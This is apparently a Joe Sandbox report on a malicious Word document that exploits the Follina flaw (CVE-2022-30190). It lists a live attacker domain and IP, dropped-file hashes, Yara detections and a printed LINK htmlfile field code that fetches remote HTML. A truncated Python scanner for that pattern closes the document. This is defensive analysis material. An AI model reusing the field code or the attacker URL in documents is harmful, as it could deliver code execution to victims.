URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
http://baza-novostei.name/dir/info/priny/t.htmlyX | ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.dr | false | Avira URL Cloud: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
195.201.110.47 | baza-novostei.name | Germany | 24940 | HETZNER-ASDE | true
        Joe Sandbox Version:36.0.0 Rainbow Opal
        Analysis ID:794514
        Start date and time:2023-01-30 16:38:00 +01:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 14s
        Hypervisor based Inspection enabled:false
        Report type:light
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:6
        Number of new started drivers analysed:1
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample file name:MuUeMZphCk.docx
        Detection:MAL
        Classification:mal96.expl.evad.winDOCX@1/20@7/1
        EGA Information:Failed
        HDC Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .docx
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
        • TCP Packets have been reduced to 100
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        No simulations
        No context
        No context
        No context
        No context
        No context
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.28831879813621564
        Encrypted:false
        SSDEEP:96:KZLivvuJm3keI4sae13v9JvOvZeALMrgbHDrXJH/Xy329pkpBZcJvHa329pkpBZo:S4pOdvmRK4s4x
        MD5:DA62F69125924684FAA121DBB4DE4FC2
        SHA1:58CACD8128E436F9908644DD1BA81F0D16C30C8A
        SHA-256:13320D9D526F1D39E73C126AD3906F85B3E1554D04EE6D7901026CA129AE021C
        SHA-512:3066A9ECCD1E881A4CAEC41E34548A69B01F4536E4119A7C4FF2CEB51E7C26FBBAA80DC9566FC30FA9032182D91D5CB8BD8D82272DD15D0F8A5A7C2E9B50A391
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z2.q.3.+C.F....e.S,...X.F...Fa.q...............................U.RiF.-..O.............{..a@.`..7....A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.6723917104927228
        Encrypted:false
        SSDEEP:96:KACy8ohW4YPse21a5clDIVaoGjmmoEbAUoEbAOv52klKcEmA3ot5AA0bPn33//9n:PRhlYPse9KyV/GVRDRH52khWEYf9
        MD5:5D3DB6D5B5E852B5E80860BF6C58C559
        SHA1:302701752ED873B41D65156F690F837CF282F21E
        SHA-256:42EBD2452242BBB9053666C9886A5154DE7AB0BD89060E96ECDF32268566A8FC
        SHA-512:ACA8DA284F967D161A2F39823694C7D7F5A60AEDA93E149428ABBCE2BD91085164232EDD15D081AF3E449A90128C2EDB90E480990D90B95437DF86479B6C8C31
        Malicious:false
        Reputation:low
        Preview:......M.eFy...zK...I..O.L....4.S,...X.F...Fa.q...............................{D;.N.[...h.w........}.w.@..H...y..i..S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):114
        Entropy (8bit):3.961797847617582
        Encrypted:false
        SSDEEP:3:yVlgsRlz8UW9HTXYD7WclkkLxHmRjl276:yPblzVW9k+UkqcRZ22
        MD5:CC66ED109FF8BF7F936B0164A1E2984F
        SHA1:789E0409A59BBD55E0A1BFEB522BA1B049D87A79
        SHA-256:14F8B6013287B8AA0E919902E41D30115F915BF846F5ADCCC9D84F84BACC1E13
        SHA-512:7C189C603BF1B94EABA9D9F8360D589EC4DFE283BB1E7ADC170E02A6368F3E2E7052C44E34122364C6932F8B825BA3D4D5F8F3698084ECE6F66D160B0E49C563
        Malicious:false
        Reputation:low
        Preview:..H..@....b..q....]F.S.D.-.{.7.4.3.0.3.9.9.7.-.B.6.5.7.-.4.9.E.3.-.8.6.A.3.-.C.D.B.6.7.2.B.9.7.C.4.0.}...F.S.D..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.28788979401335124
        Encrypted:false
        SSDEEP:48:I30fRBeLt97J5ltcMd56YKxwXPdlbxch7ruD52OjT456ivqB456ivq5H:K0fLg7jjqwXlNylITVmyVmuH
        MD5:698E6185D766EEAF0AA6306D4C2EA62A
        SHA1:E8D99C070FB24914A9CBE59C5758C267B5182687
        SHA-256:93B45BDED2216BAE615D02806108C2B64D4DC86B7F3CFA05E14105DF0BE7CF7C
        SHA-512:6C1A102BA7D608392CFCEE100C5D1AC5F450FBE8D62749B6348646F4E1829E43C0DA2A4722DA2518A1B930CBB25A054B656C48F06B83F474A6B8A32312B1595D
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z(...f.7H....|...S,...X.F...Fa.q..............................&..qoH.Jw(.R.........3'....@J.mH0.z...A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.22210892012795055
        Encrypted:false
        SSDEEP:48:I3Sg3UrBjpzyF2ChhvPiRE0O3CFTAtkhDvLtM7JOeM7JO2:Kz3CjRydhAE0WkvXtoJOeoJO2
        MD5:72A9F24FA21B0038AEB713CB6120691A
        SHA1:E5E04F213DC78D81E20E38828257809FDD6C2847
        SHA-256:BB1CF9146FDE49E20F49A3675C0F40D73A50FE382E1CD803238424CAA80C3CB9
        SHA-512:1C15DB398DC9659CADC1845A07BBFA26968E68A39734C4B38C4E27ABBC21A0246ABAA44625817952389F531899A632F8AACF809F62CD2E870D3F87E97CEC86E5
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z.=^:j]tM....L..5S,...X.F...Fa.q..............................r'.s.J..Q..!............8(..H.6).W...P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):114
        Entropy (8bit):3.901668435580097
        Encrypted:false
        SSDEEP:3:yVlgsRlz2bzGhkIe3kdV6s8TOaXOHYlLlZ276:yPblzCKne3kqs8TFeHYDZ22
        MD5:85FE3E54F9BEAA55887F2553E20757A4
        SHA1:C04256BDD0C66CCB3588A9CA31C81AEF0B9D8B3A
        SHA-256:4B0C62EFA9EA80AE96E1F0703705400E339A590368747C89738A60940EFC2B95
        SHA-512:9349BA612345F1CA913C7F1EF613FA10EEC8A5ADF90C4A1B6802B20FB9B725202DCF4F7E5BCC00FD7541D1EC170BD124B5AE9362F1AB7531A6EBB63FE4C1532B
        Malicious:false
        Reputation:low
        Preview:..H..@....b..q....]F.S.D.-.{.D.A.A.E.A.1.D.B.-.A.9.D.3.-.4.B.C.E.-.A.0.0.E.-.2.4.1.7.1.7.F.E.4.2.1.B.}...F.S.D..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):162
        Entropy (8bit):4.43530643106624
        Encrypted:false
        SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
        MD5:4F8E702CC244EC5D4DE32740C0ECBD97
        SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
        SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
        SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
        Malicious:false
        Yara Hits:
        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm, Author: Nasreddine Bencherchali, Christian Burkard
        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm, Author: Joe Security
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Reputation:moderate, very likely benign file
        Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with very long lines (4518)
        Category:dropped
        Size (bytes):6336
        Entropy (8bit):5.021080934873899
        Encrypted:false
        SSDEEP:192:/KiSe+1GPw6utZ7UPg9N2EFWeBKBZOJiQjtz:5U7/UPgP2Eb6IJZ
        MD5:12B73F8BAE89EB92C8CDA74269C2F69F
        SHA1:EF4647A4DA8B76494E9F5CCC105D034134EBB419
        SHA-256:5AB0198CE6E52F0691A5424278A549E5D4257BCD67735AD5EC2D2B273E6E6400
        SHA-512:D46D68E4AB253AC45046E7549D208B37EDAB31BC975906D7759A4DDEA7F2209C487E15CDC6C622785F0011A8DFBACBF3E7BFEA95585A20611C75D23472CCC536
        Malicious:false
        Reputation:low
        Preview:<!doctype html>.<html lang="en">.<head>.<title>.Basic HTML Template.</title>.</head>.<body>...<p>.Proin a interdum justo. Duis sed dui vitae ex molestie egestas et tincidunt neque. Fusce lectus tellus, pharetra id ex at, consectetur hendrerit nibh. Nulla sit amet commodo risus. Nulla sed dapibus ante, sit amet fringilla dui. Nunc lectus mauris, porttitor quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus...Morbi convallis get rekt m8, at consequat purus vulputate sit amet. Morbi a ultricies risus, id maximus purus. Fusce aliquet tortor id ante ornare, non auctor tortor luctus. Quisque laoreet, sem id porttitor eleifend, eros eros suscipit lectus, id facilisis lorem lorem nec nibh. Nullam venenatis ornare ornare. Donec varius ex ac faucibus condimentum. Aenean ultricies vitae mauris cursus ornare
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):162
        Entropy (8bit):4.43530643106624
        Encrypted:false
        SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
        MD5:4F8E702CC244EC5D4DE32740C0ECBD97
        SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
        SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
        SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
        Malicious:false
        Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with very long lines (4518)
        Category:dropped
        Size (bytes):6336
        Entropy (8bit):5.021080934873899
        Encrypted:false
        SSDEEP:192:/KiSe+1GPw6utZ7UPg9N2EFWeBKBZOJiQjtz:5U7/UPgP2Eb6IJZ
        MD5:12B73F8BAE89EB92C8CDA74269C2F69F
        SHA1:EF4647A4DA8B76494E9F5CCC105D034134EBB419
        SHA-256:5AB0198CE6E52F0691A5424278A549E5D4257BCD67735AD5EC2D2B273E6E6400
        SHA-512:D46D68E4AB253AC45046E7549D208B37EDAB31BC975906D7759A4DDEA7F2209C487E15CDC6C622785F0011A8DFBACBF3E7BFEA95585A20611C75D23472CCC536
        Malicious:true
        Yara Hits:
        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm, Author: Nasreddine Bencherchali, Christian Burkard
        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm, Author: Joe Security
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Preview:<!doctype html>.<html lang="en">.<head>.<title>.Basic HTML Template.</title>.</head>.<body>...<p>.Proin a interdum justo. Duis sed dui vitae ex molestie egestas et tincidunt neque. Fusce lectus tellus, pharetra id ex at, consectetur hendrerit nibh. Nulla sit amet commodo risus. Nulla sed dapibus ante, sit amet fringilla dui. Nunc lectus mauris, porttitor quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus...Morbi convallis get rekt m8, at consequat purus vulputate sit amet. Morbi a ultricies risus, id maximus purus. Fusce aliquet tortor id ante ornare, non auctor tortor luctus. Quisque laoreet, sem id porttitor eleifend, eros eros suscipit lectus, id facilisis lorem lorem nec nibh. Nullam venenatis ornare ornare. Donec varius ex ac faucibus condimentum. Aenean ultricies vitae mauris cursus ornare
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text, with very long lines (4518)
        Category:dropped
        Size (bytes):6336
        Entropy (8bit):5.021080934873899
        Encrypted:false
        SSDEEP:192:/KiSe+1GPw6utZ7UPg9N2EFWeBKBZOJiQjtz:5U7/UPgP2Eb6IJZ
        MD5:12B73F8BAE89EB92C8CDA74269C2F69F
        SHA1:EF4647A4DA8B76494E9F5CCC105D034134EBB419
        SHA-256:5AB0198CE6E52F0691A5424278A549E5D4257BCD67735AD5EC2D2B273E6E6400
        SHA-512:D46D68E4AB253AC45046E7549D208B37EDAB31BC975906D7759A4DDEA7F2209C487E15CDC6C622785F0011A8DFBACBF3E7BFEA95585A20611C75D23472CCC536
        Malicious:true
        Yara Hits:
        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm, Author: Nasreddine Bencherchali, Christian Burkard
        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm, Author: Joe Security
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Preview:<!doctype html>.<html lang="en">.<head>.<title>.Basic HTML Template.</title>.</head>.<body>...<p>.Proin a interdum justo. Duis sed dui vitae ex molestie egestas et tincidunt neque. Fusce lectus tellus, pharetra id ex at, consectetur hendrerit nibh. Nulla sit amet commodo risus. Nulla sed dapibus ante, sit amet fringilla dui. Nunc lectus mauris, porttitor quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus...Morbi convallis get rekt m8, at consequat purus vulputate sit amet. Morbi a ultricies risus, id maximus purus. Fusce aliquet tortor id ante ornare, non auctor tortor luctus. Quisque laoreet, sem id porttitor eleifend, eros eros suscipit lectus, id facilisis lorem lorem nec nibh. Nullam venenatis ornare ornare. Donec varius ex ac faucibus condimentum. Aenean ultricies vitae mauris cursus ornare
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):5632
        Entropy (8bit):2.0883867069142816
        Encrypted:false
        SSDEEP:24:ruNK//zjb7FwNYg1Ky1KqiDE2/8u2oUFwNYg1Kg1KqZi7:ru4veNYvtqit7v5NYvvqZ
        MD5:590B07601415F1D20B9D8DF1F3290207
        SHA1:385D509E9B8B490D23927752A84CF9BCE328B017
        SHA-256:584220FA7DF12F57A3EE4E5602DD11ACA994B8BB3EF46FA819D258908691C9A3
        SHA-512:DD6CCE4121F0E0137440DEEBF52D4D7CC9A48B118C75A13A7C17765E52B494EDFE64B2B8B9F280E63411421E43C8016130F95307E02A752D3B368A242042F779
        Malicious:false
        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1536
        Entropy (8bit):0.8333364598047724
        Encrypted:false
        SSDEEP:6:olgI5lNUJW9/O1KKKWkujJcPYB4PxZUtLimN:4tG1KKltJEZ4
        MD5:C9998821F542F790130D4250654012FE
        SHA1:AB4CA8443BD5535C5C3FB64599299C2635EC394A
        SHA-256:3A6465A9158E9F0B51F150701110F8F9C639494FBA10A19466142AC5E4CDAF76
        SHA-512:FC7FBD1702A707033C5A2C5C2414767F6CC54B3FF7237FC59B314B26F86860247B6C89F6A6A3CE3F1BD0A0CD3D0DF0CE697510C11B97171897D65859CDE19AD5
        Malicious:false
        Preview:..L.I.N.K. .h.t.m.l.f.i.l.e. .".h.t.t.p.:././.b.a.z.a.-.n.o.v.o.s.t.e.i...n.a.m.e./.d.i.r./.i.n.f.o./.p.r.i.n.y./.t...h.t.m.l.!.". .".". .\.p. .\.f. .0..... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....U
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.025566439551804574
        Encrypted:false
        SSDEEP:6:I3DPcwz9C0/3FvxggLRnW8ctVEz3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPj9CIZLW0zRvYg3J/
        MD5:D8541EE8209C0790C7DB7D752993B728
        SHA1:867905DB02054B4DB2514EBF6F57AE0E8EB345F0
        SHA-256:22BAEA64A5FD08FC1D62B19F72BB8AEABED58A9A89FD57CE84DE2315C33FB6F1
        SHA-512:83624927D95E795EB3AA2F0A6960C588C1E748F78CFC5403BAD9416FA9B5A0D8E18EE70B106B20CC99CB871E16753335DA6CB7671B89944C9B7BBDDD15833E31
        Malicious:false
        Preview:......M.eFy...z(...f.7H....|...S,...X.F...Fa.q............................0....@C....p...........3'....@J.mH0.z.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.025440811431057704
        Encrypted:false
        SSDEEP:6:I3DPcV+w9HvxggLRrgsO+FRXv//4tfnRujlw//+GtluJ/eRuj:I3DPYp9PHTvYg3J/
        MD5:661520ABBD6F539F4F1078C88FBE0FE4
        SHA1:D543A83CCD0CF2C3879F30CD2A632F3502EB2A23
        SHA-256:C920CE90D8D88B9CFDC096072F1102D1EC0C333182EAD1C688B4957CFDEFC83F
        SHA-512:D90AF1C0A98E7FEB19E25E9C92A6C6D8354FADF119370B6F3D5F9B8D66AB404EEDE30EC37C439846F88740F5B41AA98AA3357EBD2CE819C536E16BDF44FB1447
        Malicious:false
        Preview:......M.eFy...z2.q.3.+C.F....e.S,...X.F...Fa.q.............................&...LG.yE...m............{..a@.`..7........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Fri Dec 30 23:38:13 2022, length=11537, window=hide
        Category:dropped
        Size (bytes):1019
        Entropy (8bit):4.548181582713359
        Encrypted:false
        SSDEEP:12:8UN80gXg/XAlCPCHaXNBQtB/SxXX+WcY5itW0juicvbOdllz54qqVmNDtZ3YilMy:85k/XT9SUiZXNeq5zsUDv3q/u7D
        MD5:79E172BFC53379DE07E8580D55EEF81B
        SHA1:CBD123829BA037B2EE561D4CC49DA58767D8ACE8
        SHA-256:48313F54888B36603325A55956DB0E28C92AA56239AF94CC1AFEA91213A23530
        SHA-512:8D2AE4963E0E51ED27890CDB03714DA14DED3EC55C29A2681FE0021CB899B396FD422E2EB7C58884BD10A13F2959E515606197499B81FD1FED2A03279326831B
        Malicious:false
        Preview:L..................F.... .....r..3....r..3..wh4M.5...-...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..-..?V.. .MUUEMZ~1.DOC..L......hT..hT..*...r.....'...............M.u.U.e.M.Z.p.h.C.k...d.o.c.x.......y...............-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop\MuUeMZphCk.docx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.M.u.U.e.M.Z.p.h.C.k...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......405464..........D_....3N...W...9G..N..... .....[D_....3N...W...9G
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Generic INItialization configuration [misc]
        Category:dropped
        Size (bytes):72
        Entropy (8bit):4.768980259211503
        Encrypted:false
        SSDEEP:3:bDuMJlwQwtV0O9VomxWjDV0O9Vov:bC/59VQD59Vy
        MD5:3B4F0D70AFFDA7569F0C30A6B8CE8437
        SHA1:9D183DF509C1C16E7665DD6D535269D63BF452A1
        SHA-256:CAB652AB0416F9CF4830AB4D0D81FB512466F6C53D2BC46712B4F234BAF85E5A
        SHA-512:1A6384392152B89D0B069E9734C4802A3C7FC776F219F1F23E3A4693FE75FEB09B58A50D72C5D19A47AD246461A9DC5E8AC89357D912EDFBA1355140A541B540
        Malicious:false
        Preview:[folders]..Templates.LNK=0..MuUeMZphCk.LNK=0..[misc]..MuUeMZphCk.LNK=0..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.503835550707525
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
        MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
        SHA1:23684CCAA587C442181A92E722E15A685B2407B1
        SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
        SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.503835550707525
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
        MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
        SHA1:23684CCAA587C442181A92E722E15A685B2407B1
        SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
        SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
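        The 1536-byte dropped file listed above carries the Word field code LINK htmlfile "http://baza-novostei.name/dir/info/priny/t.html!" "" \p \f 0, and the HTML pages Word fetched from that address are the ones hitting the msdt / ms-msdt Yara rules. The script below is an added triage example, not part of the Joe Sandbox report or of the analysed sample: it statically scans a .docx package for the two forms this delivery takes, a relationship with TargetMode="External" whose target ends in ".html!" and a LINK htmlfile field code with the same trailing "!". The minimal .docx it builds is constructed for the demonstration; only the target URL string is copied from the dropped-file preview above, and nothing is ever fetched from it.

```python
"""Added triage example (not part of the Joe Sandbox report or of the analysed
sample): scan a .docx package for the Follina (CVE-2022-30190) delivery pattern,
an external OLE relationship or a LINK htmlfile field whose target URL ends in
".html!". The scan is purely static; nothing is downloaded."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"

# External target ending in ".html!" (or ".htm!"); the trailing '!' is the
# characteristic marker of Follina-style OLE link targets.
HTML_BANG = re.compile(r"\.html?!$", re.IGNORECASE)
# Field-code form, as in the dropped file's preview:
#   LINK htmlfile "http://.../t.html!" "" \p \f 0
LINK_FIELD = re.compile(r'LINK\s+htmlfile\s+"([^"]+!)"', re.IGNORECASE)


def scan_docx(data: bytes) -> list[dict]:
    """Return one finding per suspicious external relationship or LINK htmlfile field."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith(".rels"):
                root = ET.fromstring(zf.read(name))
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    target = rel.get("Target", "").strip()
                    if rel.get("TargetMode") == "External" and HTML_BANG.search(target):
                        findings.append({
                            "part": name,
                            "kind": "external-rel",
                            "rel_type": rel.get("Type", "").rsplit("/", 1)[-1],
                            "target": target,
                        })
            elif name.endswith(".xml"):
                # Field instructions live in w:instrText. Word may split one field
                # across several runs, so a production scanner should join the
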